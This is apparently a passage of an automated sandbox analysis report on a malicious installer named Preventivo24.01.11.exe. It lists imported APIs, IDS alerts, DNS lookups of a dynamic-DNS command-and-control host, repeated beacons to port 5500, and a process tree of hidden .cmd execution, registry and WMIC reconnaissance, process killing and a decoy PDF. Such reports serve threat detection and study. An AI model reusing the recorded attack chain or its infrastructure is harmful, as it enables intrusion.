GetEnvironmentStringsW, InitializeCriticalSectionEx, CloseHandle, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, FlushFileBuffers, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, OutputDebugStringW, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, GetLocalTime, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, CreateNamedPipeW, ConnectNamedPipe, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, QueryPerformanceCounter, QueryPerformanceFrequency, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, WakeAllConditionVariable, SleepConditionVariableSRW, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetTimeZoneInformation, GetConsoleMode, GetFileSizeEx, SetFilePointerEx, FindFirstFileExW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, ReadConsoleW, WriteConsoleW, LoadLibraryA, CreateFileW

imagehlp.dll

SymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.593.184.216.3449705802834928 01/23/24-12:07:53.684308	TCP	2834928	ETPRO MALWARE Observed Suspicious UA (AdvancedInstaller)	49705	80	192.168.2.5	93.184.216.34

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:07:53.581320047 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:07:53.683980942 CET	80	49705	93.184.216.34	192.168.2.5
Jan 23, 2024 12:07:53.684055090 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:07:53.684308052 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:07:53.786777973 CET	80	49705	93.184.216.34	192.168.2.5
Jan 23, 2024 12:07:53.788326025 CET	80	49705	93.184.216.34	192.168.2.5
Jan 23, 2024 12:07:53.788338900 CET	80	49705	93.184.216.34	192.168.2.5
Jan 23, 2024 12:07:53.788379908 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:07:53.791717052 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:07:53.791754007 CET	49705	80	192.168.2.5	93.184.216.34
Jan 23, 2024 12:08:16.152400970 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.152427912 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.152594090 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.153938055 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.153948069 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.469278097 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.469732046 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.469748974 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.473352909 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.473433018 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.491621017 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.491714001 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.491950989 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.533902884 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.545238972 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.545249939 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.592170954 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.595654011 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.595817089 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:16.596030951 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.598957062 CET	49725	443	192.168.2.5	184.25.164.138
Jan 23, 2024 12:08:16.598973036 CET	443	49725	184.25.164.138	192.168.2.5
Jan 23, 2024 12:08:17.351562023 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:17.473833084 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:08:17.473953962 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:17.474174023 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:17.481069088 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:17.603526115 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:08:27.607677937 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:27.730367899 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:08:37.732742071 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:37.855794907 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:08:47.857789040 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:47.979919910 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:08:57.982894897 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:08:58.105575085 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:08.107656956 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:08.230109930 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:18.232619047 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:18.355920076 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:28.357666016 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:28.480063915 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:38.482588053 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:38.605389118 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:48.607680082 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:48.730592012 CET	5500	49726	140.228.29.110	192.168.2.5
Jan 23, 2024 12:09:58.748208046 CET	49726	5500	192.168.2.5	140.228.29.110
Jan 23, 2024 12:09:58.870758057 CET	5500	49726	140.228.29.110	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 23, 2024 12:07:53.450872898 CET	63513	53	192.168.2.5	1.1.1.1
Jan 23, 2024 12:07:53.569462061 CET	53	63513	1.1.1.1	192.168.2.5
Jan 23, 2024 12:08:13.893914938 CET	51941	53	192.168.2.5	1.1.1.1
Jan 23, 2024 12:08:14.119822979 CET	53	51941	1.1.1.1	192.168.2.5
Jan 23, 2024 12:08:27.269921064 CET	55614	53	192.168.2.5	1.1.1.1
Jan 23, 2024 12:08:27.429405928 CET	53	55614	1.1.1.1	192.168.2.5
Jan 23, 2024 12:08:43.592642069 CET	58347	53	192.168.2.5	1.1.1.1
Jan 23, 2024 12:08:43.732146978 CET	53	58347	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 23, 2024 12:07:53.450872898 CET	192.168.2.5	1.1.1.1	0x2bee	Standard query (0)	www.example.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:13.893914938 CET	192.168.2.5	1.1.1.1	0x413e	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:27.269921064 CET	192.168.2.5	1.1.1.1	0x1a77	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:43.592642069 CET	192.168.2.5	1.1.1.1	0xc0dc	Standard query (0)	vnvariant2024.ddnsfree.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 23, 2024 12:07:53.569462061 CET	1.1.1.1	192.168.2.5	0x2bee	No error (0)	www.example.com	93.184.216.34	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:14.119822979 CET	1.1.1.1	192.168.2.5	0x413e	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:27.429405928 CET	1.1.1.1	192.168.2.5	0x1a77	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false
Jan 23, 2024 12:08:43.732146978 CET	1.1.1.1	192.168.2.5	0xc0dc	No error (0)	vnvariant2024.ddnsfree.com	140.228.29.110	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

armmf.adobe.com

www.example.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	93.184.216.34	80	5272	C:\Users\user\Desktop\Preventivo24.01.11.exe

Timestamp	Bytes transferred	Direction	Data
Jan 23, 2024 12:07:53.684308052 CET	154	OUT	GET /download/updates.txt HTTP/1.1 Accept: / User-Agent: AdvancedInstaller Host: www.example.com Connection: Keep-Alive Cache-Control: no-cache
Jan 23, 2024 12:07:53.788326025 CET	1286	IN	HTTP/1.1 404 Not Found Accept-Ranges: bytes Age: 589411 Cache-Control: max-age=604800 Content-Type: text/html; charset=UTF-8 Date: Tue, 23 Jan 2024 11:07:53 GMT Expires: Tue, 30 Jan 2024 11:07:53 GMT Last-Modified: Tue, 16 Jan 2024 15:24:22 GMT Server: ECS (agb/52BB) Vary: Accept-Encoding X-Cache: 404-HIT Content-Length: 1256 Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 30 66 30 66 32 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 73 79 73 74 65 6d 2d 75 69 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 7d 0a 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 36 30 30 70 78 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 35 65 6d 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 64 66 64 66 66 3b 0a 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 30 2e 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 62 6f 78 2d 73 68 61 64 6f 77 3a 20 32 70 78 20 33 70 78 20 37 70 78 20 32 70 78 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 30 32 29 3b 0a 20 20 20 20 7d 0a 20 20 20 20 61 3a 6c 69 6e 6b 2c 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 38 34 38 38 66 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 7d 0a 20 20 20 20 40 6d 65 64 69 61 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 37 30 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 20 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 Data Ascii: <!doctype html><html><head> <title>Example Domain</title> <meta charset="utf-8" /> <meta http-equiv="Content-type" content="text/html; charset=utf-8" /> <meta name="viewport" content="width=device-width, initial-scale=1" /> <style type="text/css"> body { background-color: #f0f0f2; margin: 0; padding: 0; font-family: -apple-system, system-ui, BlinkMacSystemFont, "Segoe UI", "Open Sans", "Helvetica Neue", Helvetica, Arial, sans-serif; } div { width: 600px; margin: 5em auto; padding: 2em; background-color: #fdfdff; border-radius: 0.5em; box-shadow: 2px 3px 7px 2px rgba(0,0,0,0.02); } a:link, a:visited { color: #38488f; text-decoration: none; } @media (max-width: 700px) { div { margin: 0 auto; width: auto; } } </style> </head><b
Jan 23, 2024 12:07:53.788338900 CET	312	IN	Data Raw: 6f 64 79 3e 0a 3c 64 69 76 3e 0a 20 20 20 20 3c 68 31 3e 45 78 61 6d 70 6c 65 20 44 6f 6d 61 69 6e 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 54 68 69 73 20 64 6f 6d 61 69 6e 20 69 73 20 66 6f 72 20 75 73 65 20 69 6e 20 69 6c 6c 75 73 74 72 61 74 69 Data Ascii: ody><div> <h1>Example Domain</h1> <p>This domain is for use in illustrative examples in documents. You may use this domain in literature without prior coordination or asking for permission.</p> <p><a href="https://www.iana.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49725	184.25.164.138	443	7296	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe

Timestamp	Bytes transferred	Direction	Data
2024-01-23 11:08:16 UTC	475	OUT	GET /onboarding/smskillreader.txt HTTP/1.1 Host: armmf.adobe.com Connection: keep-alive Accept-Language: en-US,en;q=0.9 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br If-None-Match: "78-5faa31cce96da" If-Modified-Since: Mon, 01 May 2023 15:02:33 GMT
2024-01-23 11:08:16 UTC	198	IN	HTTP/1.1 304 Not Modified Content-Type: text/plain; charset=UTF-8 Last-Modified: Mon, 01 May 2023 15:02:33 GMT ETag: "78-5faa31cce96da" Date: Tue, 23 Jan 2024 11:08:16 GMT Connection: close

Target ID:	0
Start time:	12:07:51
Start date:	23/01/2024
Path:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\Preventivo24.01.11.exe
Imagebase:	0x9e0000
File size:	5'955'744 bytes
MD5 hash:	32F35B78A3DC5949CE3C99F2981DEF6B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	12:07:54
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\msiexec.exe" /i "C:\Users\user\AppData\Roaming\Photo and Fax Vn\Photo and vn 1.1.2\install\F97891C\main1.msi" AI_SETUPEXEPATH=C:\Users\user\Desktop\Preventivo24.01.11.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1706007874 " AI_EUIMSI="
Imagebase:	0xfb0000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:07:56
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe" /HideWindow "C:\Games\cmmc.cmd
Imagebase:	0x960000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\cmmc.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xfa0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\wbem\WMIC.exe
Wow64 process (32bit):	true
Commandline:	wmic process where (name="taskhost.exe") get commandline
Imagebase:	0x760000
File size:	427'008 bytes
MD5 hash:	E2DE6500DE1148C7F6027AD50AC8B891
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	12:07:57
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /i "taskhost.exe"
Imagebase:	0xb00000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	12:08:01
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\~.pdf
Imagebase:	0x7ff686a00000
File size:	5'641'176 bytes
MD5 hash:	24EAD1C46A47022347DC0F05F6EFBB8C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	16
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Games\viewer.exe
Wow64 process (32bit):	true
Commandline:	C:\Games\viewer.exe /HideWindow C:\Games\c.cmd
Imagebase:	0x960000
File size:	412'832 bytes
MD5 hash:	29ED7D64CE8003C0139CCCB04D9AF7F0
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 1
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c ""C:\Games\c.cmd" "
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	19
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:08:02
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\mode.com
Wow64 process (32bit):	true
Commandline:	Mode 90,20
Imagebase:	0x2d0000
File size:	26'624 bytes
MD5 hash:	FB615848338231CEBC16E32A3035C3F8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	12:08:03
Start date:	23/01/2024
Path:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2104 --field-trial-handle=1568,i,6034362121281620577,8616152877679475302,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Imagebase:	0x7ff6413e0000
File size:	3'581'912 bytes
MD5 hash:	9B38E8E8B6DD9622D24B53E095C5D9BE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	12:08:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Set GUID[ 2>Nul
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: taskkill.exePID: 7684, Parent PID: 1096

General

Target ID:	25
Start time:	12:08:03
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\taskkill.exe
Wow64 process (32bit):	true
Commandline:	taskkill /im rundll32.exe /f
Imagebase:	0x630000
File size:	74'240 bytes
MD5 hash:	CA313FD7E6C2A778FFD21CFB5C1C56CD
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	12:08:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /c Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Analysis Process: reg.exePID: 7848, Parent PID: 7828

General

Target ID:	27
Start time:	12:08:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\reg.exe
Wow64 process (32bit):	true
Commandline:	Reg Query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Profiles" /S /V Description
Imagebase:	0xfa0000
File size:	59'392 bytes
MD5 hash:	CDD462E86EC0F20DE2A1D781928B1B0C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	12:08:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 2
Imagebase:	0x2d0000
File size:	25'088 bytes
MD5 hash:	976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	12:08:04
Start date:	23/01/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\system32\cmd.exe /S /D /c" type C:\Games\cmd.txt"
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	12:08:04
Start date:	23/01/2024
